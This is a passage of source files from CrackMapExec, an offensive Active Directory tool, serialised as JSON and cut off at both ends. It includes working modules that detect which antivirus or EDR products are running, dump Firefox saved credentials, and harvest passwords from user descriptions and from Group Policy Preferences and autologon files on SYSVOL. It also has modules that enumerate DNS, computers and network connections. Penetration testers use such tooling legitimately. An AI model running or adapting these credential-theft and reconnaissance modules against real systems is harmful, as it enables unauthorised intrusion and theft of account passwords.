results[product[\"name\"]][\"pipes\"].append(pipe)\n success += 1\n except Exception as e:\n context.log.debug(str(e))\n\n self.dump_results(results, connection.hostname, success, context)\n\n def dump_results(self, results, remoteName, success, context):\n # out1 = \"On host {} found\".format(remoteName)\n out1 = \"\"\n for item in results:\n out = out1\n if \"services\" in results[item]:\n out += f\"{item} INSTALLED\"\n if \"pipes\" in results[item]:\n out += \" and it seems to be RUNNING\"\n # else:\n # for product in conf['products']:\n # if (item == product['name']) and (len(product['pipes']) == 0):\n # out += \" (NamedPipe for this service was not provided in config)\"\n elif \"pipes\" in results[item]:\n out += f\" {item} RUNNING\"\n context.log.highlight(out)\n if (len(results) < 1) and (success > 1):\n out = out1 + \" NOTHING!\"\n context.log.highlight(out)\n\n\nclass LsaLookupNames:\n timeout = None\n authn_level = None\n protocol = None\n transfer_syntax = None\n machine_account = False\n\n iface_uuid = lsat.MSRPC_UUID_LSAT\n authn = True\n\n def __init__(\n self,\n domain=\"\",\n username=\"\",\n password=\"\",\n remote_name=\"\",\n k=False,\n kdcHost=\"\",\n lmhash=\"\",\n nthash=\"\",\n aesKey=\"\",\n ):\n self.domain = domain\n self.username = username\n self.password = password\n self.remoteName = remote_name\n self.string_binding = rf\"ncacn_np:{remote_name}[\\PIPE\\lsarpc]\"\n self.doKerberos = k\n self.lmhash = lmhash\n self.nthash = nthash\n self.aesKey = aesKey\n self.dcHost = kdcHost\n\n def connect(self, string_binding=None, iface_uuid=None):\n \"\"\"Obtains a RPC Transport and a DCE interface according to the bindings and\n transfer syntax specified.\n :return: tuple of DCE/RPC and RPC Transport objects\n :rtype: (DCERPC_v5, DCERPCTransport)\n \"\"\"\n string_binding = string_binding or self.string_binding\n if not string_binding:\n raise NotImplemented(\"String binding must be defined\")\n\n rpc_transport = transport.DCERPCTransportFactory(string_binding)\n\n # Set timeout if defined\n if self.timeout:\n rpc_transport.set_connect_timeout(self.timeout)\n\n # Authenticate if specified\n if self.authn and hasattr(rpc_transport, \"set_credentials\"):\n # This method exists only for selected protocol sequences.\n rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey)\n\n if self.doKerberos:\n rpc_transport.set_kerberos(self.doKerberos, kdcHost=self.dcHost)\n\n # Gets the DCE RPC object\n dce = rpc_transport.get_dce_rpc()\n\n # Set the authentication level\n if self.authn_level:\n dce.set_auth_level(self.authn_level)\n\n # Connect\n dce.connect()\n\n # Bind if specified\n iface_uuid = iface_uuid or self.iface_uuid\n if iface_uuid and self.transfer_syntax:\n dce.bind(iface_uuid, transfer_syntax=self.transfer_syntax)\n elif iface_uuid:\n dce.bind(iface_uuid)\n\n return dce, rpc_transport\n\n def open_policy(self, dce):\n request = lsad.LsarOpenPolicy2()\n request[\"SystemName\"] = NULL\n request[\"ObjectAttributes\"][\"RootDirectory\"] = NULL\n request[\"ObjectAttributes\"][\"ObjectName\"] = NULL\n request[\"ObjectAttributes\"][\"SecurityDescriptor\"] = NULL\n request[\"ObjectAttributes\"][\"SecurityQualityOfService\"] = NULL\n request[\"DesiredAccess\"] = MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES\n resp = dce.request(request)\n return resp[\"PolicyHandle\"]\n\n def LsarLookupNames(self, dce, policyHandle, service):\n request = lsat.LsarLookupNames()\n request[\"PolicyHandle\"] = policyHandle\n request[\"Count\"] = 1\n name1 = RPC_UNICODE_STRING()\n name1[\"Data\"] = \"NT Service\\{}\".format(service)\n request[\"Names\"].append(name1)\n request[\"TranslatedSids\"][\"Sids\"] = NULL\n request[\"LookupLevel\"] = lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta\n resp = dce.request(request)\n return resp\n\n\nconf = {\n \"products\": [\n {\n \"name\": \"Bitdefender\",\n \"services\": [\n {\n \"name\": \"bdredline_agent\",\n \"description\": \"Bitdefender Agent RedLine Service\",\n },\n {\"name\": \"BDAuxSrv\", \"description\": \"Bitdefender Auxiliary Service\"},\n {\n \"name\": \"UPDATESRV\",\n \"description\": \"Bitdefender Desktop Update Service\",\n },\n {\"name\": \"VSSERV\", \"description\": \"Bitdefender Virus Shield\"},\n {\"name\": \"bdredline\", \"description\": \"Bitdefender RedLine Service\"},\n {\"name\": \"EPRedline\", \"description\": \"Bitdefender Endpoint Redline Service\"},\n {\"name\": \"EPUpdateService\", \"description\": \"Bitdefender Endpoint Update Service\"},\n {\"name\": \"EPSecurityService\", \"description\": \"Bitdefender Endpoint Security Service\"},\n {\"name\": \"EPProtectedService\", \"description\": \"Bitdefender Endpoint Protected Service\"},\n {\"name\": \"EPIntegrationService\", \"description\": \"Bitdefender Endpoint Integration Service\"},\n ],\n \"pipes\": [\n {\n \"name\": \"\\\\bdConnector\\\\ServiceControl\\\\EPSecurityService.exe\",\n \"processes\": [\"EPConsole.exe\"],\n },\n {\n \"name\": \"etw_sensor_pipe_ppl\",\n \"processes\": [\"EPProtectedService.exe\"],\n },\n {\n \"name\": \"local\\\\msgbus\\\\antitracker.low\\\\*\",\n \"processes\": [\"bdagent.exe\"],\n },\n {\n \"name\": \"local\\\\msgbus\\\\aspam.actions.low\\\\*\",\n \"processes\": [\"bdagent.exe\"],\n },\n {\n \"name\": \"local\\\\msgbus\\\\bd.process.broker.pipe\",\n \"processes\": [\"bdagent.exe\", \"bdservicehost.exe\", \"updatesrv.exe\"],\n },\n {\"name\": \"local\\\\msgbus\\\\bdagent*\", \"processes\": [\"bdagent.exe\"]},\n {\n \"name\": \"local\\\\msgbus\\\\bdauxsrv\",\n \"processes\": [\"bdagent.exe\", \"bdntwrk.exe\"],\n },\n ],\n },\n {\n \"name\": \"Windows Defender\",\n \"services\": [\n {\n \"name\": \"WinDefend\",\n \"description\": \"Windows Defender Antivirus Service\",\n },\n {\n \"name\": \"Sense\",\n \"description\": \"Windows Defender Advanced Threat Protection Service\",\n },\n {\n \"name\": \"WdNisSvc\",\n \"description\": \"Windows Defender Antivirus Network Inspection Service\",\n },\n ],\n \"pipes\": [],\n },\n {\n \"name\": \"ESET\",\n \"services\": [\n {\"name\": \"ekm\", \"description\": \"ESET\"},\n {\"name\": \"epfw\", \"description\": \"ESET\"},\n {\"name\": \"epfwlwf\", \"description\": \"ESET\"},\n {\"name\": \"epfwwfp\", \"description\": \"ESET\"},\n {\"name\": \"EraAgentSvc\", \"description\": \"ESET\"},\n ],\n \"pipes\": [{\"name\": \"nod_scriptmon_pipe\", \"processes\": [\"\"]}],\n },\n {\n \"name\": \"CrowdStrike\",\n \"services\": [\n {\n \"name\": \"CSFalconService\",\n \"description\": \"CrowdStrike Falcon Sensor Service\",\n }\n ],\n \"pipes\": [\n {\n \"name\": \"CrowdStrike\\\\{*\",\n \"processes\": [\"CSFalconContainer.exe\", \"CSFalconService.exe\"],\n }\n ],\n },\n {\n \"name\": \"SentinelOne\",\n \"services\": [\n {\n \"name\": \"SentinelAgent\",\n \"description\": \"SentinelOne Endpoint Protection Agent\",\n },\n {\n \"name\": \"SentinelStaticEngine\",\n \"description\": \"Manage static engines for SentinelOne Endpoint Protection\",\n },\n {\n \"name\": \"LogProcessorService\",\n \"description\": \"Manage logs for SentinelOne Endpoint Protection\",\n },\n ],\n \"pipes\": [\n {\"name\": \"SentinelAgentWorkerCert.*\", \"processes\": [\"\"]},\n {\"name\": \"DFIScanner.Etw.*\", \"processes\": [\"SentinelStaticEngine.exe\"]},\n {\"name\": \"DFIScanner.Inline.*\", \"processes\": [\"SentinelAgent.exe\"]},\n ],\n },\n {\n \"name\": \"Carbon Black App Control\",\n \"services\": [{\"name\": \"Parity\", \"description\": \"Carbon Black App Control Agent\"}],\n \"pipes\": [],\n },\n {\n \"name\": \"Cybereason\",\n \"services\": [\n {\n \"name\": \"CybereasonActiveProbe\",\n \"description\": \"Cybereason Active Probe\",\n },\n {\"name\": \"CybereasonCRS\", \"description\": \"Cybereason Anti-Ransomware\"},\n {\n \"name\": \"CybereasonBlocki\",\n \"description\": \"Cybereason Execution Prevention\",\n },\n ],\n \"pipes\": [\n {\n \"name\": \"CybereasonAPConsoleMinionHostIpc_*\",\n \"processes\": [\"minionhost.exe\"],\n },\n {\n \"name\": \"CybereasonAPServerProxyIpc_*\",\n \"processes\": [\"minionhost.exe\"],\n },\n ],\n },\n {\n \"name\": \"Kaspersky Security for Windows Server\",\n \"services\": [\n {\n \"name\": \"kavfsslp\",\n \"description\": \"Kaspersky Security Exploit Prevention Service\",\n },\n \n {\n \"name\": \"KAVFS\",\n \"description\": \"Kaspersky Security Service\",\n },\n\n {\n \"name\": \"KAVFSGT\",\n \"description\": \"Kaspersky Security Management Service\",\n },\n \n {\n \"name\": \"klnagent\",\n \"description\": \"Kaspersky Security Center\",\n },\n ],\n \"pipes\": [\n {\n \"name\": \"Exploit_Blocker\",\n \"processes\": [\"kavfswh.exe\"],\n },\n \n ],\n }, \n {\n \"name\": \"Trend Micro Endpoint Security\",\n \"services\": [\n {\n \"name\": \"Trend Micro Endpoint Basecamp\",\n \"description\": \"Trend Micro Endpoint Basecamp\",\n },\n \n {\n \"name\": \"TMBMServer\",\n \"description\": \"Trend Micro Unauthorized Change Prevention Service\",\n },\n\n {\n \"name\": \"Trend Micro Web Service Communicator\",\n \"description\": \"Trend Micro Web Service Communicator\",\n },\n \n {\n \"name\": \"TMiACAgentSvc\",\n \"description\": \"Trend Micro Application Control Service (Agent)\",\n },\n { \n \"name\": \"CETASvc\",\n \"description\": \"Trend Micro Cloud Endpoint Telemetry Service\",\n },\n {\n \n \"name\": \"iVPAgent\",\n \"description\": \"Trend Micro Vulnerability Protection Service (Agent)\",\n } \n ],\n \"pipes\": [\n {\n \"name\": \"IPC_XBC_XBC_AGENT_PIPE_*\",\n \"processes\": [\"EndpointBasecamp.exe\"],\n },\n {\n \"name\": \"iacagent_*\",\n \"processes\": [\"TMiACAgentSvc.exe\"],\n },\n {\n \"name\": \"OIPC_LWCS_PIPE_*\",\n \"processes\": [\"TmListen.exe\"],\n },\n {\n \"name\": \"Log_ServerNamePipe\",\n \"processes\": [\"LogServer.exe\"],\n },\n {\n \"name\": \"OIPC_NTRTSCAN_PIPE_*\",\n \"processes\": [\"Ntrtscan.exe\"],\n },\n ],\n }, \n {\n \"name\": \"Symantec Endpoint Protection\",\n \"services\": [\n {\n \"name\": \"SepMasterService\",\n \"description\": \"Symantec Endpoint Protection\",\n },\n {\n \"name\": \"SepScanService\",\n \"description\": \"Symantec Endpoint Protection Scan Services\",\n },\n {\"name\": \"SNAC\", \"description\": \"Symantec Network Access Control\"},\n ],\n \"pipes\": [],\n },\n {\n \"name\": \"Sophos Intercept X\",\n \"services\": [\n {\n \"name\": \"SntpService\",\n \"description\": \"Sophos Network Threat Protection\"\n },\n {\n \"name\": \"Sophos Endpoint Defense Service\",\n \"description\": \"Sophos Endpoint Defense Service\"\n },\n {\n \"name\": \"Sophos File Scanner Service\",\n \"description\": \"Sophos File Scanner Service\"\n },\n {\n \"name\": \"Sophos Health Service\",\n \"description\": \"Sophos Health Service\"\n },\n {\n \"name\": \"Sophos Live Query\",\n \"description\": \"Sophos Live Query\"\n },\n {\n \"name\": \"Sophos Managed Threat Response\",\n \"description\": \"Sophos Managed Threat Response\"\n },\n {\n \"name\": \"Sophos MCS Agent\",\n \"description\": \"Sophos MCS Agent\"\n },\n {\n \"name\": \"Sophos MCS Client\",\n \"description\": \"Sophos MCS Client\"\n },\n {\n \"name\": \"Sophos System Protection Service\",\n \"description\": \"Sophos System Protection Service\"\n }\n ],\n \"pipes\": [\n {\"name\": \"SophosUI\", \"processes\": [\"\"]},\n {\"name\": \"SophosEventStore\", \"processes\": [\"\"]},\n {\"name\": \"sophos_deviceencryption\", \"processes\": [\"\"]},\n {\"name\": \"sophoslivequery_*\", \"processes\": [\"\"]},\n ],\n },\n {\n \"name\": \"G DATA Security Client\",\n \"services\": [\n {\n \"name\": \"AVKWCtl\",\n \"description\": \"Anti-virus Kit Window Control\",\n },\n {\n \"name\": \"AVKProxy\", \n \"description\": \"G Data AntiVirus Proxy Service\"\n },\n {\n \"name\": \"GDScan\",\n \"description\": \"GDSG Data AntiVirus Scan Service\",\n },\n ],\n \"pipes\": [\n {\n \"name\": \"exploitProtectionIPC\",\n \"processes\": [\"AVKWCtlx64.exe\"],\n },\n ],\n },\n {\n \"name\": \"Panda Adaptive Defense 360\",\n \"services\": [\n {\n \"name\": \"PandaAetherAgent\",\n \"description\": \"Panda Endpoint Agent\",\n },\n {\n \"name\": \"PSUAService\", \n \"description\": \"Panda Product Service\"\n },\n {\n \"name\": \"NanoServiceMain\",\n \"description\": \"Panda Cloud Antivirus Service\",\n },\n ],\n \"pipes\": [\n {\n \"name\": \"NNS_API_IPC_SRV_ENDPOINT\",\n \"processes\": [\"PSANHost.exe\"],\n },\n {\n \"name\": \"PSANMSrvcPpal\",\n \"processes\": [\"PSUAService.exe\"],\n },\n ],\n }\n \n ]\n}\n" }, { "path": "cme/modules/enum_dns.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom cme.helpers.logger import write_log\n\n\nclass CMEModule:\n \"\"\"\n Uses WMI to dump DNS from an AD DNS Server.\n Module by @fang0654\n \"\"\"\n\n name = \"enum_dns\"\n description = \"Uses WMI to dump DNS from an AD DNS Server\"\n supported_protocols = [\"smb\", \"wmi\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.domains = None\n\n def options(self, context, module_options):\n \"\"\"\n DOMAIN Domain to enumerate DNS for. Defaults to all zones.\n \"\"\"\n self.domains = None\n if module_options and \"DOMAIN\" in module_options:\n self.domains = module_options[\"DOMAIN\"]\n\n def on_admin_login(self, context, connection):\n if not self.domains:\n domains = []\n output = connection.wmi(\"Select Name FROM MicrosoftDNS_Zone\", \"root\\\\microsoftdns\")\n\n if output:\n for result in output:\n domains.append(result[\"Name\"][\"value\"])\n\n context.log.success(\"Domains retrieved: {}\".format(domains))\n else:\n domains = [self.domains]\n data = \"\"\n for domain in domains:\n output = connection.wmi(\n f\"Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = {domain}\",\n \"root\\\\microsoftdns\",\n )\n\n if output:\n domain_data = {}\n context.log.highlight(f\"Results for {domain}\")\n data += f\"Results for {domain}\\n\"\n for entry in output:\n text = entry[\"TextRepresentation\"][\"value\"]\n rname = text.split(\" \")[0]\n rtype = text.split(\" \")[2]\n rvalue = \" \".join(text.split(\" \")[3:])\n if domain_data.get(rtype, False):\n domain_data[rtype].append(f\"{rname}: {rvalue}\")\n else:\n domain_data[rtype] = [f\"{rname}: {rvalue}\"]\n\n for k, v in sorted(domain_data.items()):\n context.log.highlight(f\"Record Type: {k}\")\n data += f\"Record Type: {k}\\n\"\n for d in sorted(v):\n context.log.highlight(\"\\t\" + d)\n data += \"\\t\" + d + \"\\n\"\n\n log_name = \"DNS-Enum-{}-{}.log\".format(connection.host, datetime.now().strftime(\"%Y-%m-%d_%H%M%S\"))\n write_log(data, log_name)\n context.log.display(f\"Saved raw output to ~/.cme/logs/{log_name}\")\n" }, { "path": "cme/modules/example_module.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n \"\"\"\n Example\n Module by @yomama\n \"\"\"\n\n name = \"example module\"\n description = \"I do something\"\n supported_protocols = [] # Example: ['smb', 'mssql']\n opsec_safe = True # Does the module touch disk?\n multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n\n def options(self, context, module_options):\n \"\"\"Required.\n Module options get parsed here. Additionally, put the modules usage here as well\n \"\"\"\n pass\n\n def on_login(self, context, connection):\n \"\"\"Concurrent.\n Required if on_admin_login is not present. This gets called on each authenticated connection\n \"\"\"\n # Logging best practice\n # Mostly you should use these functions to display information to the user\n context.log.display(\"I'm doing something\") # Use this for every normal message ([*] I'm doing something)\n context.log.success(\"I'm doing something\") # Use this for when something succeeds ([+] I'm doing something)\n context.log.fail(\"I'm doing something\") # Use this for when something fails ([-] I'm doing something), for example a remote registry entry is missing which is needed to proceed\n context.log.highlight(\"I'm doing something\") # Use this for when something is important and should be highlighted, printing credentials for example\n\n # These are for debugging purposes\n context.log.info(\"I'm doing something\") # This will only be displayed if the user has specified the --verbose flag, so add additional info that might be useful\n context.log.debug(\"I'm doing something\") # This will only be displayed if the user has specified the --debug flag, so add info that you would might need for debugging errors\n\n # These are for more critical error handling\n context.log.error(\"I'm doing something\") # This will not be printed in the module context and should only be used for critical errors (e.g. a required python file is missing)\n try:\n raise Exception(\"Exception that might occure\")\n except Exception as e:\n context.log.exception(f\"Exception occured: {e}\") # This will display an exception traceback screen after an exception was raised and should only be used for critical errors\n\n def on_admin_login(self, context, connection):\n \"\"\"Concurrent.\n Required if on_login is not present\n This gets called on each authenticated connection with Administrative privileges\n \"\"\"\n pass\n\n def on_request(self, context, request):\n \"\"\"Optional.\n If the payload needs to retrieve additional files, add this function to the module\n \"\"\"\n pass\n\n def on_response(self, context, response):\n \"\"\"Optional.\n If the payload sends back its output to our server, add this function to the module to handle its output\n \"\"\"\n pass\n\n def on_shutdown(self, context, connection):\n \"\"\"Optional.\n Do something on shutdown\n \"\"\"\n pass\n" }, { "path": "cme/modules/find-computer.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nimport sys\n\nclass CMEModule:\n '''\n Module by CyberCelt: @Cyb3rC3lt\n\n Initial module:\n https://github.com/Cyb3rC3lt/CrackMapExec-Modules\n '''\n \n name = 'find-computer'\n description = 'Finds computers in the domain via the provided text'\n supported_protocols = ['ldap']\n opsec_safe = True\n multiple_hosts = False\n\n def options(self, context, module_options):\n '''\n find-computer: Specify find-computer to call the module\n TEXT: Specify the TEXT option to enter your text to search for\n Usage: cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT=\"server\"\n cme ldap $DC-IP -u Username -p Password -M find-computer -o TEXT=\"SQL\"\n '''\n\n self.TEXT = ''\n\n if 'TEXT' in module_options:\n self.TEXT = module_options['TEXT']\n else:\n context.log.error('TEXT option is required!')\n exit(1)\n\n def on_login(self, context, connection):\n\n # Building the search filter\n searchFilter = \"(&(objectCategory=computer)(&(|(operatingSystem=*\"+self.TEXT+\"*)(name=*\"+self.TEXT+\"*))))\"\n\n try:\n context.log.debug('Search Filter=%s' % searchFilter)\n resp = connection.ldapConnection.search(searchFilter=searchFilter,\n attributes=['dNSHostName','operatingSystem'],\n sizeLimit=0)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n context.log.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n resp = e.getAnswers()\n pass\n else:\n logging.debug(e)\n return False\n\n answers = []\n context.log.debug('Total no. of records returned %d' % len(resp))\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n dNSHostName = ''\n operatingSystem = ''\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'dNSHostName':\n dNSHostName = str(attribute['vals'][0])\n elif str(attribute['type']) == 'operatingSystem':\n operatingSystem = attribute['vals'][0]\n if dNSHostName != '' and operatingSystem != '':\n answers.append([dNSHostName,operatingSystem])\n except Exception as e:\n context.log.debug(\"Exception:\", exc_info=True)\n context.log.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(answers) > 0:\n context.log.success('Found the following computers: ')\n for answer in answers:\n try:\n IP = socket.gethostbyname(answer[0])\n context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],IP))\n context.log.debug('IP found')\n except socket.gaierror as e:\n context.log.debug('Missing IP')\n context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],\"No IP Found\"))\n else:\n context.log.success('Unable to find any computers with the text \"' + self.TEXT + '\"')\n" }, { "path": "cme/modules/firefox.py", "content": "#!/usr/bin/env python3\nfrom dploot.lib.target import Target\nfrom cme.protocols.smb.firefox import FirefoxTriage\n\n\nclass CMEModule:\n \"\"\"\n Firefox by @zblurx\n Inspired by firefox looting from DonPAPI\n https://github.com/login-securite/DonPAPI\n \"\"\"\n\n name = \"firefox\"\n description = \"Dump credentials from Firefox\"\n supported_protocols = [\"smb\"]\n opsec_safe = True # Does the module touch disk?\n multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?\n\n def options(self, context, module_options):\n \"\"\"Dump credentials from Firefox\"\"\"\n pass\n\n def on_admin_login(self, context, connection):\n host = connection.hostname + \".\" + connection.domain\n domain = connection.domain\n username = connection.username\n kerberos = connection.kerberos\n aesKey = connection.aesKey\n use_kcache = getattr(connection, \"use_kcache\", False)\n password = getattr(connection, \"password\", \"\")\n lmhash = getattr(connection, \"lmhash\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n\n target = Target.create(\n domain=domain,\n username=username,\n password=password,\n target=host,\n lmhash=lmhash,\n nthash=nthash,\n do_kerberos=kerberos,\n aesKey=aesKey,\n use_kcache=use_kcache,\n )\n\n try:\n # Collect Firefox stored secrets\n firefox_triage = FirefoxTriage(target=target, logger=context.log)\n firefox_triage.upgrade_connection(connection=connection.conn)\n firefox_credentials = firefox_triage.run()\n for credential in firefox_credentials:\n context.log.highlight(\n \"[%s][FIREFOX] %s %s:%s\"\n % (\n credential.winuser,\n credential.url + \" -\" if credential.url != \"\" else \"-\",\n credential.username,\n credential.password,\n )\n )\n except Exception as e:\n context.log.debug(\"Error while looting firefox: {}\".format(e))\n" }, { "path": "cme/modules/get-desc-users.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ldap import ldap as ldap_impacket\nimport re\nfrom cme.logger import cme_logger\n\n\nclass CMEModule:\n \"\"\"\n Get description of users\n Module by @nodauf\n \"\"\"\n\n name = \"get-desc-users\"\n description = \"Get description of the users. May contained password\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True # Does the module touch disk?\n multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?\n\n def options(self, context, module_options):\n \"\"\"\n FILTER Apply the FILTER (grep-like) (default: '')\n PASSWORDPOLICY Is the windows password policy enabled ? (default: False)\n MINLENGTH Minimum password length to match, only used if PASSWORDPOLICY is True (default: 6)\n \"\"\"\n self.FILTER = \"\"\n self.MINLENGTH = \"6\"\n self.PASSWORDPOLICY = False\n if \"FILTER\" in module_options:\n self.FILTER = module_options[\"FILTER\"]\n if \"MINLENGTH\" in module_options:\n self.MINLENGTH = module_options[\"MINLENGTH\"]\n if \"PASSWORDPOLICY\" in module_options:\n self.PASSWORDPOLICY = True\n self.regex = re.compile(\"((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\\d)|(?=[^ ]*[a-z])(?=[^ ]*\\d)(?=[^ ]*[^\\w \\n])|(?=[^ ]*[A-Z])(?=[^ ]*\\d)(?=[^ ]*[^\\w \\n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\\w \\n]))[^ \\n]{\" + self.MINLENGTH + \",}\") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following\n\n def on_login(self, context, connection):\n \"\"\"Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection\"\"\"\n # Building the search filter\n searchFilter = \"(objectclass=user)\"\n\n try:\n context.log.debug(\"Search Filter=%s\" % searchFilter)\n resp = connection.ldapConnection.search(\n searchFilter=searchFilter,\n attributes=[\"sAMAccountName\", \"description\"],\n sizeLimit=0,\n )\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find(\"sizeLimitExceeded\") >= 0:\n context.log.debug(\"sizeLimitExceeded exception caught, giving up and processing the data received\")\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n cme_logger.debug(e)\n return False\n\n answers = []\n context.log.debug(\"Total of records returned %d\" % len(resp))\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n sAMAccountName = \"\"\n description = \"\"\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"description\":\n description = attribute[\"vals\"][0]\n if sAMAccountName != \"\" and description != \"\":\n answers.append([sAMAccountName, description])\n except Exception as e:\n context.log.debug(\"Exception:\", exc_info=True)\n context.log.debug(\"Skipping item, cannot process due to error %s\" % str(e))\n pass\n answers = self.filter_answer(context, answers)\n if len(answers) > 0:\n context.log.success(\"Found following users: \")\n for answer in answers:\n context.log.highlight(\"User: {} description: {}\".format(answer[0], answer[1]))\n\n def filter_answer(self, context, answers):\n # No option to filter\n if self.FILTER == \"\" and not self.PASSWORDPOLICY:\n context.log.debug(\"No filter option enabled\")\n return answers\n answersFiltered = []\n context.log.debug(\"Prepare to filter\")\n if len(answers) > 0:\n for answer in answers:\n conditionFilter = False\n description = str(answer[1])\n # Filter\n if self.FILTER != \"\":\n conditionFilter = False\n if self.FILTER in description:\n conditionFilter = True\n\n # Password policy\n if self.PASSWORDPOLICY:\n conditionPasswordPolicy = False\n if self.regex.search(description):\n conditionPasswordPolicy = True\n\n if self.FILTER and conditionFilter and self.PASSWORDPOLICY and conditionPasswordPolicy:\n answersFiltered.append([answer[0], description])\n elif not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy:\n answersFiltered.append([answer[0], description])\n elif not self.PASSWORDPOLICY and self.FILTER and conditionFilter:\n answersFiltered.append([answer[0], description])\n return answersFiltered\n" }, { "path": "cme/modules/get_netconnections.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom cme.helpers.logger import write_log\nimport json\n\n\nclass CMEModule:\n \"\"\"\n Uses WMI to extract network connections, used to find multi-homed hosts.\n Module by @fang0654\n\n \"\"\"\n\n name = \"get_netconnections\"\n description = \"Uses WMI to query network connections.\"\n supported_protocols = [\"smb\", \"wmi\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n No options\n \"\"\"\n pass\n\n def on_admin_login(self, context, connection):\n data = []\n cards = connection.wmi(f\"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration\")\n if cards:\n for c in cards:\n if c[\"IPAddress\"].get(\"value\"):\n context.log.success(f\"IP Address: {c['IPAddress']['value']}\\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}\")\n\n data.append(cards)\n\n log_name = \"network-connections-{}-{}.log\".format(connection.host, datetime.now().strftime(\"%Y-%m-%d_%H%M%S\"))\n write_log(json.dumps(data), log_name)\n context.log.display(f\"Saved raw output to ~/.cme/logs/{log_name}\")\n" }, { "path": "cme/modules/gpp_autologin.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\n\n\nclass CMEModule:\n \"\"\"\n Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1\n Module by @byt3bl33d3r\n \"\"\"\n\n name = \"gpp_autologin\"\n description = \"Searches the domain controller for registry.xml to find autologon information and returns the username and password.\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_login(self, context, connection):\n shares = connection.shares()\n for share in shares:\n if share[\"name\"] == \"SYSVOL\" and \"READ\" in share[\"access\"]:\n context.log.success(\"Found SYSVOL share\")\n context.log.display(\"Searching for Registry.xml\")\n\n paths = connection.spider(\"SYSVOL\", pattern=[\"Registry.xml\"])\n\n for path in paths:\n context.log.display(\"Found {}\".format(path))\n\n buf = BytesIO()\n connection.conn.getFile(\"SYSVOL\", path, buf.write)\n xml = ET.fromstring(buf.getvalue())\n\n if xml.findall('.//Properties[@name=\"DefaultPassword\"]'):\n usernames = []\n passwords = []\n domains = []\n\n xml_section = xml.findall(\".//Properties\")\n\n for section in xml_section:\n attrs = section.attrib\n\n if attrs[\"name\"] == \"DefaultPassword\":\n passwords.append(attrs[\"value\"])\n\n if attrs[\"name\"] == \"DefaultUserName\":\n usernames.append(attrs[\"value\"])\n\n if attrs[\"name\"] == \"DefaultDomainName\":\n domains.append(attrs[\"value\"])\n\n if usernames or passwords:\n context.log.success(\"Found credentials in {}\".format(path))\n context.log.highlight(\"Usernames: {}\".format(usernames))\n context.log.highlight(\"Domains: {}\".format(domains))\n context.log.highlight(\"Passwords: {}\".format(passwords))\n" }, { "path": "cme/modules/gpp_password.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xml.etree.ElementTree as ET\nfrom Cryptodome.Cipher import AES\nfrom base64 import b64decode\nfrom binascii import unhexlify\nfrom io import BytesIO\n\n\nclass CMEModule:\n \"\"\"\n Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1\n Module by @byt3bl33d3r\n \"\"\"\n\n name = \"gpp_password\"\n description = \"Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_login(self, context, connection):\n shares = connection.shares()\n for share in shares:\n if share[\"name\"] == \"SYSVOL\" and \"READ\" in share[\"access\"]:\n context.log.success(\"Found SYSVOL share\")\n context.log.display(\"Searching for potential XML files containing passwords\")\n\n paths = connection.spider(\n \"SYSVOL\",\n pattern=[\n \"Groups.xml\",\n \"Services.xml\",\n \"Scheduledtasks.xml\",\n \"DataSources.xml\",\n 